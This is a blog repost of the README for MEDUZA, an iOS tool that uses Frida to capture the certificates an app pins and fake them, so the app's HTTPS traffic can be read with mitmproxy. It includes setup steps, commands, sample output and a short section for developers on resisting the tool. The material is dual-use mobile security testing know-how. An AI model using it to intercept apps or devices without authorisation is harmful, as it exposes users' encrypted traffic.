src="https://1.bp.blogspot.com/-TLGeEX7NEgg/X4Uqjd5FibI/AAAAAAAAUBQ/3VnK57T0_FkuF2kfY4D5LgU0xRTs6O6kgCNcBGAsYHQ/w640-h352/MEDUZA_2_mitmpoxy.png" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-4pJveBV4Bx0/X4UqjKvVb_I/AAAAAAAAUBM/pBQfw5ozuso6EPwy7z08aUaZEkP0d6lyACNcBGAsYHQ/s2510/MEDUZA_1_frida-script.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1108" data-original-width="2510" height="282" src="https://1.bp.blogspot.com/-4pJveBV4Bx0/X4UqjKvVb_I/AAAAAAAAUBM/pBQfw5ozuso6EPwy7z08aUaZEkP0d6lyACNcBGAsYHQ/w640-h282/MEDUZA_1_frida-script.png" width="640" /></a></div><p><br /></p><p>"MEDUZA" ("медуза") means "jellyfish" in Ukrainian</p> <br /><span style="font-size: large;"><b>What is MEDUZA?</b></span><br /> <p>It's a <a href="https://frida.re/" rel="nofollow" target="_blank" title="Frida">Frida</a>-based tool, my replacement for <a href="https://github.com/nabla-c0d3/ssl-kill-switch2" rel="nofollow" target="_blank" title="SSLKillSwitch">SSLKillSwitch</a>. I created it for in-house use, but then decided to opensource it. TBH, I hate open source, but the world is full of compromises... :(</p><span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>How does it work?</b></span><br /> <p>It's simple. First time, you run an app without <a href="https://www.kitploit.com/search/label/Sniffing" target="_blank" title="sniffing">sniffing</a> and use it as usual. MEDUZA is sitting quietly and collecting <a href="https://www.kitploit.com/search/label/Certificates" target="_blank" title="certificates">certificates</a> used by the app to connect servers. Then MEDUZA generates a Frida script that fakes (==upnin) the collected certificates. So you run the app for second time, use the generated script, and catch the traffic with mitmproxy.</p> <br /><span style="font-size: large;"><b>Limitations</b></span><br /> <p>MEDUZA can only unpin apps using iOS system SSL libs. Some apps (e.g. Instagram) do not use the system SSL libs, they implement some third-party custom SSL stack (for example, <a href="https://www.kitploit.com/search/label/Instagram" target="_blank" title="Instagram">Instagram</a> uses OpenSSL statically linked to an Instagram private frameworks, see <a href="https://github.com/kov4l3nko/InstagramSSLPinningBypass-iOS" rel="nofollow" target="_blank" title="InstagramSSLPinningBypass-iOS">InstagramSSLPinningBypass-iOS</a> for details).</p> <p>Also, MEDUZA is based on Frida, so it does not work on apps with anti-Frida protection.</p> <br /><span style="font-size: large;"><b>Can I use MEDUZA alongside with other SSL bypass tools, e.g. SSLKillSwitch?</b></span><br /> <p>I didn't test it, but MEDUZA employs a different approach than SSLKillSwitch and similar tools, so, theoretically, they should work together without problems. Again, I didn't test it, so I'm not 100% sure.</p> <br /><span style="font-size: large;"><b>Requirements</b></span><br /> <ul> <li> <p>A Mac with MacOS Mojave or later (maybe MEDUZA works on Windows and Linux as well, but it was not tested)</p> </li> <li> <p>A jailbroken iOS device (MEDUZA was tested on iPhone SE 2016 with iOS 13.3 and iPhone 6s with iOS 14.0, both are jailbroken with <a href="https://checkra.in/" rel="nofollow" target="_blank" title="checkra1n">checkra1n</a>; theoretically, MEDUZA should work with other devices as well, but it was not tested)</p> </li> <li> <p>The latest <a href="https://frida.re/" rel="nofollow" target="_blank" title="Frida">Frida</a> installed on the Mac and the iOS device.</p> </li> <li> <p><a href="https://mitmproxy.org/" rel="nofollow" target="_blank" title="Mitmproxy">Mitmproxy</a> installed on the Mac (MEDUZA was not tested with other sniffers like <a href="https://www.kitploit.com/search/label/Charles" target="_blank" title="Charles">Charles</a> proxy, I'm not sure it will work)</p> </li> <li> <p>The Mac and iOS device should be connected with a USB data cable and connected to the same WiFi network.</p> </li> <li> <p>Python 3 with <a href="https://pypi.org/project/cryptography/" rel="nofollow" target="_blank" title="cryptography">cryptography</a> on the Mac (just <code>pip install cryptography</code>)</p> </li> </ul> <br /><span style="font-size: large;"><b>How to sniff HTTP(s) traffic?</b></span><br /> <p>There are two general steps. You need the first step to catch all certificates pinned by an app and generate a script to fake (==unpin) them. You should do it just once at the very beginning, then you can just use the generated script to sniff the traffic. The instruction for the first step:</p> <ol> <li> <p>Open Terminal on your Mac and run MEDUZA to list the installed/running apps on your iOS device:</p> <pre><code>$ python3 meduza.py -l<br /></code></pre> <p>The output should look like</p> <pre><code>MEDUZA iOS SSL unpinning tool<br />by Dima Kovalenko (@kov4l3nko)<br />============================================================<br /><br />[*] Waiting for an iOS device connected to USB...<br />[*] A list of installed applications:<br /> + Uber (com.ubercab.UberClient) is running, pid=40663<br /> - Home (com.apple.Home)<br /> - Files (com.apple.DocumentsApp)<br /> - Podcasts (com.apple.podcasts)<br /> - Contacts (com.apple.MobileAddressBook)<br /> - Music (com.apple.Music)<br /> - Photos (com.apple.mobileslideshow)<br /> - TV (com.apple.tv)<br /> + App Store (com.apple.AppStore) is running, pid=40627<br /> - Clock (com.apple.mobiletimer)<br /> + Settings (com.apple.Preferences) is running, pid=40619<br /> - TikTok (com.zhiliaoapp.musically)<br /> - Watch (com.apple.Bridge)<br /> - FaceTime (com.apple.facetime)<br /> - Maps (com.apple.Maps)<br /> - Voice Memos (com.apple.VoiceMemos)<br /> <...etc, you'll see remaining apps here...><br /></code></pre> </li> <li> <p><strong>Important!</strong> Make sure your iOS device WiFi settings are "clear", e.g. no proxy and/or custom router IP specified. On the first step, we <strong>do not try to sniff the traffic</strong>, so the WiFi network connection should be "as usual".</p> </li> <li> <p>Choose the app, e.g. Uber. Run MEDUZA as follows</p> <pre><code>$ python3 meduza.py -s <app name of id> <path/to/the/frida/script.js><br /></code></pre> <p>e.g. for Uber</p> <pre><code>$ python3 meduza.py -s com.ubercab.UberClient ./unpinUber.js<br /></code></pre> <p>Here <code>-s</code> means that Uber will be (re-)spawned. If you wanna connect to an already running app and do not re-spawn it, use <code>-a</code> instead of <code>-s</code>.</p> <p>As result, you should see something like</p> <pre><code>MEDUZA iOS SSL unpinning tool<br />by Dima Kovalenko (@kov4l3nko)<br />============================================================<br /><br />[*] Waiting for an iOS device connected to USB...<br />[*] Spawning com.ubercab.UberClient...<br />[*] Attaching to com.ubercab.UberClient...<br />[*] Reading JS payload meduza.js...<br />[*] Injecting JS payload to the process...<br />[*] SecCertificateCreateWithBytes(...) hooked!<br />[*] Resuming the application...<br />[*] Press ENTER to complete (you can do it anytime)...<br />[*] Got another certificate, its raw SHA256 hash: 99b05557bafde776f0afc15bbf6733585b8a03606cbf757158fb96324e01310a<br /> crashlytics.com<br /> reports.crashlytics.com<br /> firebase-settings.crashlytics.com<br /> apps-ios.crashlytics.com<br /> android-sdk.crashlytics.com<br /> api.crashlytics.com<br /> settings-api.crashlytics.com<br /> download.crashlytics.com<br /> distribution-uploads.crashlytics.com<br /> cm-us-east-1.crashlytics.com<br /> www.crashlytics.com<br /> try.crash lytics.com<br /> kits.crashlytics.com<br /> cm.crashlytics.com<br /> apps.crashlytics.com<br /> cm-ap-southeast.crashlytics.com<br /> settings.crashlytics.com<br /> e.crashlytics.com<br />[*] Got another certificate, its raw SHA256 hash: 954a9f7dd9f03784bdc5ca9183484a5bfc278ca9ba9f42b3a82f96cffddf277b<br />[*] Got another certificate, its raw SHA256 hash: 649a4665273e60b353fe9b4db1807d9669f82cb0ee85bd1e562e7c2f33fdec3a<br /> *.cfe.uber.com<br /> cfe.uber.com<br /> cn-dca1.cfe.uber.com<br />[*] Got another certificate, its raw SHA256 hash: eae72eb454bf6c3977ebd289e970b2f5282949190093d0d26f98d0f0d6a9cf17<br /><...etc, you can see many messages about certificates, it's ok...><br /></code></pre> </li> <li> <p>Do something typical in the app: login, tap some buttons, logoff... e.g. act like an ordinary dumb user :) Every time the app uses a (pinned or not pinned) certificate to connect a server, MEDUZA catches and remembers the certificate.</p> </li> <li> <p>As soon as you complete your monkey-tapping, press <code>ENTER</code> in the Terminal. MEDUZA will generate a script (e.g. <code>./unpinUber.js</code> in the example above).</p> </li> </ol> <p>The first step is completed. The second step is to use the script:</p> <ol> <li> <p>Run <code>ifconfig | grep "inet "</code> in your Mac Terminal to see your Mac's IP address.</p> </li> <li> <p>Run Mitmproxy on your Mac</p> </li> <li> <p>On your iOS device, set the Mac's IP and mitmproxy port (<code>8080</code> by default) as a proxy for the WiFi connection.</p> </li> <li> <p>Run the generated script with the app. E.g. to (re-)spawn and unpin Uber app, run in Mac Terminal</p> <pre><code>$ frida -U -f com.ubercab.UberClient --no-pause -l ./unpinUber.js<br /></code></pre> <p>See Frida documentation for other options (e.g. to connect already running application).</p> </li> </ol> <br /><span style="font-size: large;"><b>How to protect an app from MEDUZA?</b></span><br /> <p>There are many ways to do it, e.g.</p> <ol> <li> <p>Instagram uses a statically-linked fork of OpenSSL instead of iOS system libs to implement SSL stack. That is why MEDUZA doesn't work on Instagram.</p> </li> <li> <p>You can add some anti-Frida <a href="https://www.kitploit.com/search/label/Protection" target="_blank" title="protection">protection</a> to your app. MEDUZA is based on Frida: if Frida fails, MEDUZA fails as well.</p> </li> </ol> <br /><span style="font-size: large;"><b>MEDUZA doesn't work, what to do?</b></span><br /> <p>Try to fix it yourself or create an issue. However, I take a look at this GitHub account from time to time ( ==once a year) and support MEDUZA in my spare time ( ==never), so I can't guarantee any support. Welcome to the opensource world ;(</p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/kov4l3nko/MEDUZA" rel="nofollow" target="_blank" title="Download MEDUZA">Download MEDUZA</a></span></b></div>Unknownnoreply@blogger.com